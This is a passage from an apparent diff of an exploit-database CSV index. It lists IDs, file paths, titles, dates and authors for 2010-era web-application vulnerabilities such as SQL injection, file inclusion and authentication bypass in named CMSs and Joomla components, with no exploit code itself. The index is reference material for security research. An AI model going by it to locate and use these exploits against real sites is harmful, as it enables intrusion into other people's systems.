Bypass",2010-02-28,Phenom,webapps,asp, +11609,exploits/php/webapps/11609.txt,"phptroubleticket 2.0 - 'id' SQL Injection",2010-03-01,kaMtiEz,webapps,php, +11610,exploits/php/webapps/11610.txt,"CMS by MyWorks - Multiple Vulnerabilities",2010-03-01,Palyo34,webapps,php, +11611,exploits/asp/webapps/11611.txt,"Al Sat Scripti - Database Disclosure",2010-03-02,indoushka,webapps,asp, +11612,exploits/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,indoushka,webapps,php, +11613,exploits/php/webapps/11613.txt,"PHP Advanced Transfer Manager 1.10 - Arbitrary File Upload",2010-03-02,indoushka,webapps,php, +11614,exploits/php/webapps/11614.txt,"Uploadify Sample Collection - Arbitrary File Upload",2010-03-02,indoushka,webapps,php, +11616,exploits/php/webapps/11616.txt,"My Little Forum - 'contact.php' SQL Injection",2010-03-02,"Easy Laster",webapps,php, +11619,exploits/php/webapps/11619.txt,"Uiga Church Portal - 'index.php' SQL Injection",2010-03-02,"Easy Laster",webapps,php, +11620,exploits/php/webapps/11620.txt,"Dosya Yukle Scrtipi (DosyaYukle Scripti) 1.0 - Arbitrary File Upload",2010-03-03,indoushka,webapps,php, +11621,exploits/php/webapps/11621.txt,"Gnat-TGP 1.2.20 - Remote File Inclusion",2010-03-03,cr4wl3r,webapps,php, +11623,exploits/php/webapps/11623.txt,"smartplugs 1.3 - 'showplugs.php' SQL Injection",2010-03-03,"Easy Laster",webapps,php, +11624,exploits/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution",2010-03-03,JosS,webapps,php, +11625,exploits/php/webapps/11625.txt,"Joomla! Component com_blog - Directory Traversal",2010-03-03,"DevilZ TM",webapps,php, +11627,exploits/php/webapps/11627.txt,"PHP-Nuke CMS (Survey and Poll) - SQL Injection",2010-03-04,SENOT,webapps,php, +11631,exploits/php/webapps/11631.txt,"PHP-Nuke - 'user.php' SQL Injection",2010-03-04,"Easy Laster",webapps,php, +11634,exploits/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,webapps,hardware, +11635,exploits/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok & .:[melkiy]:",webapps,php, +11636,exploits/php/webapps/11636.php,"Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass",2010-03-05,"Hamid Ebadi",webapps,php, +11637,exploits/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - 'news.php?id' SQL Injection",2010-03-05,"Easy Laster",webapps,php, +11638,exploits/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script - 'linkid' Blind SQL Injection",2010-03-05,JosS,webapps,php, +11641,exploits/php/webapps/11641.txt,"PHPCOIN 1.2.1 - 'mod.php' Local File Inclusion",2010-03-06,_mlk_,webapps,php, +11643,exploits/php/webapps/11643.txt,"dev4u CMS (Personenseiten) - 'go_target.php' SQL Injection",2010-03-06,"Easy Laster",webapps,php, +11646,exploits/php/webapps/11646.pl,"BigForum 4.5 - SQL Injection",2010-03-07,Ctacok,webapps,php, +11648,exploits/php/webapps/11648.txt,"Bild Flirt System 2.0 - 'index.php?id' SQL Injection",2010-03-07,"Easy Laster",webapps,php, +11654,exploits/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' - 'id' news.php?SQL Injection",2010-03-08,"Easy Laster",webapps,php, +11655,exploits/php/webapps/11655.txt,"TRIBISUR 2.0 - Local File Inclusion",2010-03-08,cr4wl3r,webapps,php, +11657,exploits/php/webapps/11657.txt,"Chaton 1.5.2 - Local File Inclusion",2010-03-08,cr4wl3r,webapps,php, +11660,exploits/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,webapps,php, +11666,exploits/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re_ R4vax",webapps,php, +11667,exploits/php/webapps/11667.txt,"Joomla! Component com_hezacontent 1.0 - 'id' SQL Injection",2010-03-09,kaMtiEz,webapps,php, +11671,exploits/php/webapps/11671.txt,"mhproducts Kleinanzeigenmarkt - 'search.php' SQL Injection",2010-03-09,"Easy Laster",webapps,php, +11672,exploits/php/webapps/11672.txt,"Wild CMS - SQL Injection",2010-03-09,Ariko-Security,webapps,php, +11674,exploits/php/webapps/11674.txt,"nus newssystem 1.02 - 'id' SQL Injection",2010-03-09,n3w7u,webapps,php, +11676,exploits/php/webapps/11676.txt,"Campsite 3.3.5 - Cross-Site Request Forgery",2010-03-10,"pratul agrawal",webapps,php, +11677,exploits/hardware/webapps/11677.txt,"Friendly-Tech FriendlyTR69 CPE Remote Management 2.8.9 - SQL Injection",2010-03-10,"Yaniv Miron",webapps,hardware, +11678,exploits/php/webapps/11678.txt,"PhpCityPortal - Multiple Vulnerabilities",2010-03-10,R3d-D3V!L,webapps,php, +11679,exploits/php/webapps/11679.txt,"Softbiz Jobs and Recruitment Script - 'search_result.php' SQL Injection",2010-03-10,"Easy Laster",webapps,php, +11680,exploits/php/webapps/11680.txt,"Gazelle CMS - Cross-Site Request Forgery",2010-03-10,"pratul agrawal",webapps,php, +11681,exploits/php/webapps/11681.txt,"ispCP Omega 1.0.4 - Remote File Inclusion",2010-03-10,cr4wl3r,webapps,php, +11684,exploits/php/webapps/11684.txt,"Joomla! Component com_about - SQL Injection",2010-03-11,snakespc,webapps,php, +11685,exploits/php/webapps/11685.txt,"ATutor 1.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-11,ITSecTeam,webapps,php, +11686,exploits/php/webapps/11686.txt,"ANE CMD CRSF - Arbitrary Add Admin",2010-03-11,"pratul agrawal",webapps,php, +11687,exploits/php/webapps/11687.txt,"Ane CMS 1 - Persistent Cross-Site Scripting",2010-03-11,"pratul agrawal",webapps,php, +11688,exploits/php/webapps/11688.txt,"Joomla! Component com_blog - SQL Injection",2010-03-11,"DevilZ TM",webapps,php, +11689,exploits/php/webapps/11689.txt,"Eros Erotik Webkatalog - 'start.php?id' SQL Injection",2010-03-11,"Easy Laster",webapps,php, +11691,exploits/php/webapps/11691.txt,"Joomla! Component com_products - 'intCategoryId' SQL Injection",2010-03-11,N2n-Hacker,webapps,php, +11692,exploits/php/webapps/11692.txt,"Joomla! Component com_gigfe - SQL Injection",2010-03-11,"DevilZ TM",webapps,php, +11693,exploits/php/webapps/11693.txt,"Joomla! Component com_color - SQL Injection",2010-03-11,"DevilZ TM",webapps,php, +11695,exploits/php/webapps/11695.txt,"Joomla! Component com_party - SQL Injection",2010-03-11,"DevilZ TM",webapps,php, +11696,exploits/php/webapps/11696.txt,"Joomla! Component com_start - SQL Injection",2010-03-12,"DevilZ TM",webapps,php, +11698,exploits/php/webapps/11698.txt,"Joomla! Component com_leader - SQL Injection",2010-03-12,"DevilZ TM",webapps,php, +11699,exploits/php/webapps/11699.txt,"Joomla! Component com_family - SQL Injection",2010-03-12,"DevilZ TM",webapps,php, +11701,exploits/php/webapps/11701.txt,"Easynet Forum Host - 'topic.php' SQL Injection",2010-03-12,"Yakir Wizman",webapps,php, +11702,exploits/php/webapps/11702.pl,"Invision Power Board Currency Mod 1.3 - 'edit' SQL Injection",2010-03-12,"Yakir Wizman",webapps,php, +11704,exploits/php/webapps/11704.txt,"dreamlive Auktionshaus script - 'news.php?id' SQL Injection",2010-03-12,"Easy Laster",webapps,php, +11707,exploits/php/webapps/11707.txt,"Joomla! Component com_juliaportfolio - Local File Inclusion",2010-03-12,"DevilZ TM",webapps,php,80 +11708,exploits/php/webapps/11708.txt,"Joomla! Component com_sbsfile - Local File Inclusion",2010-03-13,"DevilZ TM",webapps,php, +11709,exploits/php/webapps/11709.txt,"Joomla! Component com_comp - SQL Injection",2010-03-13,"DevilZ TM",webapps,php, +11710,exploits/php/webapps/11710.php,"Joomla! Component com_races - Blind SQL Injection",2010-03-13,"DevilZ TM",webapps,php, +11711,exploits/php/webapps/11711.txt,"Azeno CMS - SQL Injection",2010-03-13,"DevilZ TM",webapps,php, +11715,exploits/php/webapps/11715.txt,"systemsoftware Community Black - 'index.php' SQL Injection",2010-03-13,"Easy Laster",webapps,php, +11718,exploits/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection",2010-03-13,Ctacok,webapps,php, +11719,exploits/php/webapps/11719.txt,"Mambo Component MambAds - SQL Injection",2010-03-13,Dreadful,webapps,php, +11721,exploits/php/webapps/11721.txt,"GeekHelps ADMP 1.01 - Multiple Vulnerabilities",2010-03-13,ITSecTeam,webapps,php, +11722,exploits/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ITSecTeam,webapps,php, +11723,exploits/cgi/webapps/11723.pl,"Trouble Ticket Express 3.01 - Remote Code Execution / Directory Traversal",2010-03-14,zombiefx,webapps,cgi, +11725,exploits/php/webapps/11725.txt,"Joomla! Component com_org - SQL Injection",2010-03-14,N2n-Hacker,webapps,php, +11726,exploits/php/webapps/11726.txt,"PHP-Fusion 6.01.15.4 - 'downloads.php' SQL Injection",2010-03-14,Inj3ct0r,webapps,php, +11727,exploits/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection",2010-03-14,blake,webapps,php, +11729,exploits/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Inclusion",2010-03-14,cr4wl3r,webapps,php, +40084,exploits/php/webapps/40084.txt,"IPS Community Suite 4.1.12.3 - PHP Code Injection",2016-07-11,"Egidio Romano",webapps,php,80 +11730,exploits/php/webapps/11730.txt,"Joomla! Component com_nfnaddressbook - SQL Injection",2010-03-14,snakespc,webapps,php, +11731,exploits/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Admin Bypass",2010-03-14,ITSecTeam,webapps,php, +11732,exploits/php/webapps/11732.txt,"PHP-Nuke - Local File Inclusion",2010-03-14,ITSecTeam,webapps,php, +11733,exploits/php/webapps/11733.txt,"PHPpool media Domain Verkaufs und Auktions Portal - 'index.php' SQL Injection",2010-03-14,"Easy Laster",webapps,php, +11735,exploits/php/webapps/11735.php,"DZCP (deV!L_z Clanportal) 1.5.2 - Remote File Inclusion",2010-03-14,cr4wl3r,webapps,php, +18428,exploits/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection",2012-01-30,Dr.DaShEr,webapps,php, +11737,exploits/php/webapps/11737.txt,"PhpMyLogon 2.0 - SQL Injection",2010-03-14,blake,webapps,php, +11738,exploits/php/webapps/11738.txt,"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion",2010-03-15,jdc,webapps,php, +11739,exploits/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection",2010-03-15,ITSecTeam,webapps,php, +11740,exploits/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Inclusion",2010-03-15,jdc,webapps,php, +11741,exploits/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection",2010-03-15,ITSecTeam,webapps,php, +11743,exploits/php/webapps/11743.txt,"Joomla! Component com_rpx Ulti RPX 2.1.0 - Local File Inclusion",2010-03-15,jdc,webapps,php, +11744,exploits/php/webapps/11744.txt,"Duhok Forum 1.0 script - Cross-Site Scripting",2010-03-15,indoushka,webapps,php, +11745,exploits/php/webapps/11745.txt,"FreeHost 1.00 - Arbitrary File Upload",2010-03-15,indoushka,webapps,php, +11746,exploits/php/webapps/11746.txt,"Torrent Hoster - Remount Upload",2010-03-15,EL-KAHINA,webapps,php, +11747,exploits/php/webapps/11747.txt,"CH-CMS.ch 2 - Arbitrary File Upload",2010-03-15,EL-KAHINA,webapps,php, +11748,exploits/php/webapps/11748.txt,"Interspire SHOPPING CART 5.5.4 - Ultimate Edition backup dump",2010-03-15,indoushka,webapps,php, +11749,exploits/php/webapps/11749.txt,"Subdreamer 3.0.1 - CMS upload",2010-03-15,indoushka,webapps,php, +11752,exploits/php/webapps/11752.txt,"Joomla! Component com_org - 'letter' SQL Injection",2010-03-15,kazuya,webapps,php, +11754,exploits/php/webapps/11754.txt,"Address Book Script 1.09 - Local File Inclusion",2010-03-15,"Pouya Daneshmand",webapps,php, +11755,exploits/php/webapps/11755.txt,"osDate 2.1.9 - Remote File Inclusion",2010-03-15,NoGe,webapps,php, +11756,exploits/php/webapps/11756.txt,"Joomla! Component com_linkr - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,webapps,php, +11757,exploits/php/webapps/11757.txt,"Joomla! Component com_janews - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,webapps,php, +11758,exploits/php/webapps/11758.txt,"Joomla! Component com_ganalytics - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,webapps,php, +11759,exploits/php/webapps/11759.txt,"Joomla! Component com_sectionex - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,webapps,php, +11760,exploits/php/webapps/11760.txt,"Joomla! Component com_rokdownloads - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,webapps,php, +11761,exploits/php/webapps/11761.txt,"Preisschlacht 4.0 Flash System - 'index.php?aid' SQL Injection",2010-03-15,"Easy Laster",webapps,php, +11766,exploits/php/webapps/11766.txt,"Joomla! Component com_bidding - SQL Injection",2010-03-15,N2n-Hacker,webapps,php, +11767,exploits/php/webapps/11767.txt,"Joomla! Component com_route - SQL Injection",2010-03-15,N2n-Hacker,webapps,php, +11768,exploits/php/webapps/11768.txt,"Newbie CMS - File Disclosure",2010-03-15,JIKO,webapps,php, +11771,exploits/php/webapps/11771.txt,"osCMax 2.0 - 'FCKeditor' Arbitrary File Upload",2010-03-16,ITSecTeam,webapps,php, +11772,exploits/php/webapps/11772.txt,"Joomla! Component com_rwcards - Local File Inclusion",2010-03-16,ALTBTA,webapps,php, +11773,exploits/php/webapps/11773.txt,"Free Real Estate Contact Form 1.09 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",webapps,php, +11774,exploits/php/webapps/11774.txt,"Online Community CMS by I-net - SQL Injection",2010-03-16,"Th3 RDX",webapps,php, +11775,exploits/php/webapps/11775.txt,"Short URL 1.01 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",webapps,php, +11776,exploits/php/webapps/11776.txt,"phpscripte24 Auktionshaus Community Standart System - Blind SQL Injection",2010-03-16,"Easy Laster",webapps,php, +11777,exploits/php/webapps/11777.txt,"eGroupWare 1.6.002 and eGroupWare premium line 9.1 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",webapps,php, +11778,exploits/php/webapps/11778.txt,"OSSIM 2.2 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",webapps,php, +11780,exploits/php/webapps/11780.html,"Clain_TIger_CMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",webapps,php, +11781,exploits/php/webapps/11781.html,"ChillyCMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",webapps,php, +11782,exploits/php/webapps/11782.txt,"Joomla! Component com_include - SQL Injection",2010-03-17,"DevilZ TM",webapps,php, +11783,exploits/php/webapps/11783.txt,"Preisschlacht Multi Liveshop System - 'index.php?aid' SQL Injection",2010-03-17,"Easy Laster",webapps,php, +11784,exploits/php/webapps/11784.txt,"PostNuke FormExpress Module - Blind SQL Injection",2010-03-17,"Ali Abbasi",webapps,php, +11785,exploits/php/webapps/11785.txt,"Joomla! Component com_ckforms - Multiple Vulnerabilities",2010-03-17,ALTBTA,webapps,php, +11788,exploits/php/webapps/11788.txt,"PHP-Nuke - ratedownload SQL Injection",2010-03-17,ITSecTeam,webapps,php, +11790,exploits/php/webapps/11790.txt,"Joomla! Component com_vxdate - Multiple Vulnerabilities",2010-03-17,MustLive,webapps,php, +11793,exploits/jsp/webapps/11793.txt,"ManageEngine ServiceDesk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",webapps,jsp, +11795,exploits/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 - Local File Inclusion",2010-03-18,ITSecTeam,webapps,php, +11799,exploits/php/webapps/11799.txt,"SiteDone Custom Edition 2.0 - SQL Injection / Cross-Site Scripting",2010-03-18,d3v1l,webapps,php, +11801,exploits/php/webapps/11801.txt,"phpAuthent 0.2.1 - SQL Injection",2010-03-18,Gamoscu,webapps,php, +11802,exploits/php/webapps/11802.txt,"philboard 1.02 - SQL Injection",2010-03-18,ViRuS_HiMa,webapps,php, +11805,exploits/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II - Blind SQL Injection",2010-03-18,"Easy Laster",webapps,php, +11806,exploits/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,cr4wl3r,webapps,php, +11807,exploits/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusions",2010-03-18,cr4wl3r,webapps,php, +11808,exploits/php/webapps/11808.txt,"quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting",2010-03-19,Red-D3v1L,webapps,php, +11811,exploits/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System - 'index.php?aid' SQL Injection",2010-03-19,"Easy Laster",webapps,php, +11813,exploits/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multiple Cross-Site Request Forgerys",2010-03-19,K053,webapps,php, +11814,exploits/php/webapps/11814.txt,"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",webapps,php, +11815,exploits/php/webapps/11815.txt,"Joomla! Component Gift Exchange com_giftexchange 1.0 Beta - 'pkg' SQL Injection",2010-03-20,"Chip d3 bi0s",webapps,php, +11816,exploits/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - 'auktion.php?id_auk' Blind SQL Injection",2010-03-20,"Easy Laster",webapps,php, +11823,exploits/cgi/webapps/11823.txt,"Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download",2010-03-20,n01d,webapps,cgi, +11824,exploits/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - 'ts_other.php' SQL Injection",2010-03-21,"Easy Laster",webapps,php, +11825,exploits/php/webapps/11825.html,"Adult Video Site Script - Multiple Vulnerabilities",2010-03-21,indoushka,webapps,php, +11826,exploits/php/webapps/11826.txt,"Jewelry Cart Software - 'product.php' SQL Injection",2010-03-21,Asyraf,webapps,php, +11829,exploits/php/webapps/11829.txt,"Woltlab Burning Board Lite Addon - 'lexikon.php' SQL Injection",2010-03-21,n3w7u,webapps,php, +11830,exploits/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusions",2010-03-21,cr4wl3r,webapps,php, +11831,exploits/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusions",2010-03-21,cr4wl3r,webapps,php, +11832,exploits/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,cr4wl3r,webapps,php, +11833,exploits/php/webapps/11833.txt,"4x CMS r26 - Authentication Bypass",2010-03-21,cr4wl3r,webapps,php, +11835,exploits/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - Authentication Bypass",2010-03-22,cr4wl3r,webapps,php, +11836,exploits/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,webapps,php, +14128,exploits/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,webapps,php, +11837,exploits/php/webapps/11837.txt,"Uiga Fan Club - SQL Injection",2010-03-22,"Sioma Labs",webapps,php, +11840,exploits/php/webapps/11840.txt,"PowieSys 0.7.7 alpha - 'index.php' shownews SQL Injection",2010-03-22,"Easy Laster",webapps,php, +11841,exploits/php/webapps/11841.txt,"New Advisore Stack 1.1 - Directory Traversal",2010-03-22,R3VAN_BASTARD,webapps,php, +11844,exploits/php/webapps/11844.txt,"Joomla! Component com_flash - SQL Injection",2010-03-22,"DevilZ TM",webapps,php, +11845,exploits/php/webapps/11845.txt,"Joomla! Component com_jwmmxtd - Remote File Inclusion",2010-03-23,eidelweiss,webapps,php, +11846,exploits/php/webapps/11846.txt,"Uiga Business Portal - 'index.php' SQL Injection",2010-03-23,"Easy Laster",webapps,php, +11847,exploits/windows/webapps/11847.txt,"Joomla! Component com_gds - SQL Injection",2010-03-23,"DevilZ TM",webapps,windows, +11848,exploits/php/webapps/11848.txt,"Insky CMS 006-0111 - Multiple Remote File Inclusions",2010-03-23,mat,webapps,php, +11850,exploits/php/webapps/11850.txt,"Zephyrus CMS - 'index.php' SQL Injection",2010-03-23,Phenom,webapps,php, +11851,exploits/php/webapps/11851.txt,"Joomla! Component Property - Local File Inclusion",2010-03-23,"Chip d3 bi0s",webapps,php, +11852,exploits/php/webapps/11852.txt,"Xataface - Admin Authentication Bypass",2010-03-23,Xinapse,webapps,php, +11853,exploits/php/webapps/11853.txt,"Joomla! Component SMEStorage - Local File Inclusion",2010-03-23,"Chip d3 bi0s",webapps,php, +11862,exploits/php/webapps/11862.txt,"Easy-Clanpage 2.0 - Blind SQL Injection",2010-03-24,"Easy Laster",webapps,php, +11863,exploits/php/webapps/11863.txt,"CMS By SoftnSolv - 'index.php' SQL Injection",2010-03-24,"Th3 RDX",webapps,php, +11864,exploits/php/webapps/11864.txt,"E-PHP CMS - SQL Injection",2010-03-24,"Th3 RDX",webapps,php, +11865,exploits/php/webapps/11865.txt,"Joomla! Component com_universal - Remote File Inclusion",2010-03-24,eidelweiss,webapps,php, +11866,exploits/php/webapps/11866.txt,"New-CMS - Local File Inclusion",2010-03-24,Xash,webapps,php, +11867,exploits/php/webapps/11867.txt,"Joomla! Component com_wallpapers - SQL Injection",2010-03-24,"DevilZ TM",webapps,php, +11868,exploits/php/webapps/11868.txt,"Joomla! Component com_software - SQL Injection",2010-03-24,"DevilZ TM",webapps,php, +11871,exploits/php/webapps/11871.txt,"vBulletin Blog 4.0.2 - Title Cross-Site Scripting",2010-03-24,FormatXformat,webapps,php, +11873,exploits/php/webapps/11873.txt,"Interactivefx.ie CMS - SQL Injection",2010-03-25,Inj3ct0r,webapps,php, +11874,exploits/php/webapps/11874.txt,"INVOhost - SQL Injection",2010-03-25,"Andrés Gómez",webapps,php, +11875,exploits/php/webapps/11875.py,"Easy-Clanpage 2.01 - SQL Injection",2010-03-25,"Easy Laster",webapps,php, +11876,exploits/php/webapps/11876.txt,"justVisual 2.0 - 'index.php' Local File Inclusion",2010-03-25,eidelweiss,webapps,php, +11881,exploits/php/webapps/11881.php,"SiteX CMS 0.7.4 Beta - 'photo.php' SQL Injection",2010-03-25,Sc0rpi0n,webapps,php, +11882,exploits/php/webapps/11882.txt,"Direct News 4.10.2 - Multiple Remote File Inclusions",2010-03-25,mat,webapps,php, +11883,exploits/php/webapps/11883.txt,"WebsiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,webapps,php, +11884,exploits/php/webapps/11884.txt,"Joomla! Component dcsFlashGames 2.0RC1 - 'catid' SQL Injection",2010-03-26,kaMtiEz,webapps,php, +11885,exploits/php/webapps/11885.txt,"Flirt Matching Sms System - SQL Injection",2010-03-26,"Easy Laster",webapps,php, +11888,exploits/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Inclusions",2010-03-26,2010-03-26,webapps,php, +11889,exploits/php/webapps/11889.txt,"leaftec CMS - Multiple Vulnerabilities",2010-03-26,Valentin,webapps,php, +11892,exploits/php/webapps/11892.txt,"post Card - 'catid' SQL Injection",2010-03-26,"Hussin X",webapps,php, +11894,exploits/php/webapps/11894.txt,"CmsFaethon 2.2.0 (ultimate.7z) - Multiple Vulnerabilities",2010-03-26,eidelweiss,webapps,php, +11895,exploits/php/webapps/11895.txt,"CyberCMS - SQL Injection",2010-03-26,hc0de,webapps,php, +11896,exploits/php/webapps/11896.txt,"BPTutors Tutoring site script - Cross-Site Request Forgery (Add Admin)",2010-03-26,bi0,webapps,php, +11897,exploits/php/webapps/11897.php,"Kasseler CMS 1.4.x lite Module Jokes - SQL Injection",2010-03-26,Sc0rpi0n,webapps,php, +11898,exploits/php/webapps/11898.py,"Date & Sex Vor und Rückwärts Auktions System 2 - Blind SQL Injection",2010-03-27,"Easy Laster",webapps,php, +11899,exploits/php/webapps/11899.html,"AdaptCMS Lite 1.5 - Arbitrary Add Admin",2010-03-27,ITSecTeam,webapps,php, +11902,exploits/php/webapps/11902.txt,"MyOWNspace 8.2 - Multiple Local File Inclusions",2010-03-27,ITSecTeam,webapps,php, +11903,exploits/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - Multiple File Inclusions",2010-03-27,ITSecTeam,webapps,php, +11904,exploits/php/webapps/11904.txt,"68KB - Multiple Remote File Inclusions",2010-03-27,ITSecTeam,webapps,php, +11905,exploits/php/webapps/11905.txt,"Simple Machines Forum (SMF) 1.1.8 - 'avatar' Remote PHP File Execute (PoC)",2010-03-27,JosS,webapps,php, +11906,exploits/php/webapps/11906.txt,"Uebimiau Webmail 2.7.2 - Multiple Vulnerabilities",2010-03-27,cp77fk4r,webapps,php, +11908,exploits/php/webapps/11908.txt,"Joomla! Component com_solution - SQL Injection",2010-03-27,"DevilZ TM",webapps,php, +11912,exploits/php/webapps/11912.txt,"Multi Auktions Komplett System 2 - Blind SQL Injection",2010-03-28,"Easy Laster",webapps,php, +11914,exploits/php/webapps/11914.txt,"Joomla! Component com_adds - Blind SQL Injection",2010-03-28,"DevilZ TM",webapps,php, +11915,exploits/php/webapps/11915.txt,"Joomla! Component com_tariff - SQL Injection",2010-03-28,"DevilZ TM",webapps,php, +11916,exploits/php/webapps/11916.txt,"Joomla! Component com_agency - SQL Injection",2010-03-28,"DevilZ TM",webapps,php, +11917,exploits/php/webapps/11917.txt,"Joomla! Component com_teacher - SQL Injection",2010-03-28,"DevilZ TM",webapps,php, +11918,exploits/php/webapps/11918.txt,"Joomla! Component com_science - SQL Injection",2010-03-28,"DevilZ TM",webapps,php, +11919,exploits/php/webapps/11919.txt,"Joomla! Component com_topmenu - SQL Injection",2010-03-28,"DevilZ TM",webapps,php, +11920,exploits/php/webapps/11920.txt,"Joomla! Component com_personal - SQL Injection",2010-03-28,"DevilZ TM",webapps,php, +11922,exploits/php/webapps/11922.txt,"Devana - SQL Injection",2010-03-28,Valentin,webapps,php, +11923,exploits/php/webapps/11923.txt,"TSOKA:CMS 1.1/1.9/2.0 - SQL Injection / Cross-Site Scripting",2010-03-28,d3v1l,webapps,php, +11924,exploits/php/webapps/11924.txt,"Joomla! Component com_units - SQL Injection",2010-03-28,"DevilZ TM",webapps,php, +11925,exploits/php/webapps/11925.txt,"68KB Knowledge Base Script 1.0.0rc2 - Search SQL Injection",2010-03-28,"Jelmer de Hen",webapps,php, +11927,exploits/php/webapps/11927.txt,"Joomla! Component com_departments - SQL Injection",2010-03-29,"DevilZ TM",webapps,php, +11928,exploits/php/webapps/11928.txt,"Joomla! Component com_business - SQL Injection",2010-03-29,"DevilZ TM",webapps,php, +11929,exploits/php/webapps/11929.txt,"Joomla! Component com_radio - SQL Injection",2010-03-29,"DevilZ TM",webapps,php, +11931,exploits/asp/webapps/11931.txt,"Asp - comersus7F Shopping Cart Software Backup Dump",2010-03-29,indoushka,webapps,asp, +11934,exploits/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch 2.09 - SQL Injection",2010-03-29,"Easy Laster",webapps,php, +11935,exploits/php/webapps/11935.txt,"Joomla! Component com_guide - SQL Injection",2010-03-30,"DevilZ TM",webapps,php, +11938,exploits/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File",2010-03-30,eidelweiss,webapps,php, +11939,exploits/php/webapps/11939.txt,"Joomla! Component com_spec - SQL Injection",2010-03-29,"DevilZ TM",webapps,php, +11940,exploits/php/webapps/11940.txt,"Joomla! Component com_television - SQL Injection",2010-03-29,"DevilZ TM",webapps,php, +11941,exploits/php/webapps/11941.txt,"Joomla! Component com_items - SQL Injection",2010-03-29,"DevilZ TM",webapps,php, +11942,exploits/php/webapps/11942.txt,"Joomla! Component com_actions - SQL Injection",2010-03-29,"DevilZ TM",webapps,php, +11943,exploits/php/webapps/11943.txt,"React software - Local File Inclusion",2010-03-29,SNK,webapps,php, +11946,exploits/php/webapps/11946.txt,"FaMarket 2 - Authentication Bypass",2010-03-30,indoushka,webapps,php, +11947,exploits/php/webapps/11947.txt,"Yamamah 1.00 - Multiple Vulnerabilities",2010-03-30,indoushka,webapps,php, +11948,exploits/php/webapps/11948.txt,"Denapars Shop Script - Multiple Vulnerabilities",2010-03-30,indoushka,webapps,php, +11949,exploits/php/webapps/11949.txt,"Fa-Ads - Authentication Bypass",2010-03-30,indoushka,webapps,php, +11950,exploits/php/webapps/11950.txt,"Fa Home - Authentication Bypass",2010-03-30,indoushka,webapps,php, +11954,exploits/php/webapps/11954.txt,"Wazzum Dating Software - Multiple Vulnerabilities",2010-03-30,EL-KAHINA,webapps,php, +11960,exploits/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Inclusions",2010-03-30,mat,webapps,php, +11962,exploits/php/webapps/11962.txt,"Satellite-X 4.0 - Authentication Bypass",2010-03-30,indoushka,webapps,php, +11963,exploits/php/webapps/11963.txt,"Huron CMS 8 11 2007 - Authentication Bypass",2010-03-30,mat,webapps,php, +11964,exploits/multiple/webapps/11964.pl,"Easy-Clanpage 2.1 - SQL Injection",2010-03-30,"Easy Laster",webapps,multiple, +11965,exploits/php/webapps/11965.txt,"kora - Reinstall Admin Information",2010-03-30,indoushka,webapps,php, +11967,exploits/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Arbitrary File Upload",2010-03-30,indoushka,webapps,php, +11968,exploits/php/webapps/11968.txt,"Hosting-PHP-dynamic - Authentication 